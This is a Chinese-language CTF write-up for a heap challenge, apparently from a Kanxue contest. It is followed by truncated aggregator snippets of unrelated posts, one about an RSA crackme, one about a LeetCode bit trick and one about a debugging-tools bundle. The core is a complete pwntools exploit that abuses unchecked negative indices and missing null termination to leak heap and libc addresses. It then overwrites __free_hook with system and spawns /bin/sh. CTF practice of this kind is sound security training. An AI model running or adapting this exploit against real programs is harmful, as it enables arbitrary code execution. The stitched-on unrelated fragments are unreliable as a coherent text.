堆的整數負數溢位
全保護
if ( two[v1] )//沒考慮負數
if ( one[v1] )//同樣沒考慮負數
而且read輸入後沒有\x00截斷,給leak形成條件
1、利用read沒有截斷leak出libc和堆位址
2、改free_hook為system('/bin/sh')
from pwn import *
context.os='linux'
context.arch='amd64'
debug = 1
if debug:
context.log_level='debug'
cn=process('./apwn')
#cn=process('./the_end',env=)
elf=elf('./apwn')
libc=elf.libc
#libc = elf('/lib/i386-linux-gnu/libc-2.23.so')
#libc = elf('./libc6-i386_2.23-0ubuntu10_amd64.so')
s = lambda data :cn.send(str(data))
sa = lambda delim,data :cn.sendafter(str(delim), str(data))
st = lambda delim,data :cn.sendthen(str(delim), str(data))
sl = lambda data :cn.sendline(str(data))
sla = lambda delim,data :cn.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :cn.recv(numb)
rl = lambda :cn.recvline()
ru = lambda delims :cn.recvuntil(delims)
irt = lambda :cn.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
def create_luckydog(name,partner):
ru('>>')
sl(2)
s(name)
ru("your partner's name")
s(partner)
def create_singledog(name):
ru('>>')
sl(1)
s(name)
def edit_singledog(index,name):
ru('>>')
sl(3)
sl(index)
#ru('oh,singledog,changing your name can bring you good luck.')
s(name)
def edit_luckydog(index,name,partner):
ru('>>')
sl(4)
sl(index)
s(name)
s(partner)
def dele():
ru('>>')
sl(5)
create_singledog('/bin/sh\x00'+'\x00'*0x18)#two[0]
create_luckydog('b'*0x18,'c'*0x20)#one[0]
create_singledog('/bin/sh\x00')#two[1]
create_luckydog('e'*0x18,'f'*0x20)#one[1]
#leak heap
dele()
dele()
create_singledog('\x30')
edit_singledog(0,'\x30')
ru('new name: ')
heap = uu64(r(6))-0x30
success('heap= {}'.format(hex(heap)))
#leak start
'''edit_singledog(-11,'\x08')
ru('new name: ')
start = uu64(r(6))-0x202008
success('start= {}'.format(hex(start)))
'''#leak libc
edit_singledog(-11,'\x20')
ru('new name: ')
libc_base = uu64(r(6))-libc.symbols['_io_2_1_stdout_']#0x3c5620
success('libc_base= {}'.format(hex(libc_base)))
'''edit_singledog(-4,'11111111')
ru('11111111')
#gdb.attach(cn)
libc_base = uu64(r(6))-0x3ec703 #remote
'''success('libc_base= {}'.format(hex(libc_base)))
#write free_hook
free_hook=libc_base+libc.symbols['__free_hook']
sys=libc_base+libc.symbols['system']
success('free_hook= {}'.format(hex(free_hook)))
success('system= {}'.format(hex(sys)))
edit_singledog(80,p64(free_hook))
edit_luckydog(0,'a'*0x18,p64(sys)+'\x00'*0x18)
edit_singledog(80,p64(heap+0x100))
edit_luckydog(0,'a'*0x18,'/bin/sh\x00'+'\x00'*0x18)
#gdb.attach(cn)
dele()
irt()
看雪CTF第十題
int64 sub 140006f50 while v6 初始化rop,並賦值rop str,其中str是乙個表示base進製整數的字元陣列 mpz init set str rp rsa e,input key before6,16i64 mpz init set str mpz t r,cons...
朝花夕拾 bit操作之拯救單身狗
該部落格 於一到litcode題目 題目詳情 給定乙個非空整數陣列,除了某個元素只出現一次以外,其餘每個元素均出現兩次。找出那個只出現了一次的元素。作為乙隻單身狗,看到這種題目腦海中浮現的就是在一群情侶中有乙隻被包圍的可憐的單身狗,它深受毒害,被迫吃 吃到吐。我們今天的任務就是拯救這乙隻單身狗,消滅...
程式設計資源 看雪大禮包2010
看雪大禮包2010 從網上收集來的除錯工具集.用解壓後乙個為乙個iso檔案 crack new year presents 2010.iso 用ultraiso開啟後,可以拖出選中的檔案.壓縮工具是winrar5.21 32位版本 看雪大禮包2010 從網上收集來的除錯工具集.用解壓後乙個為乙個is...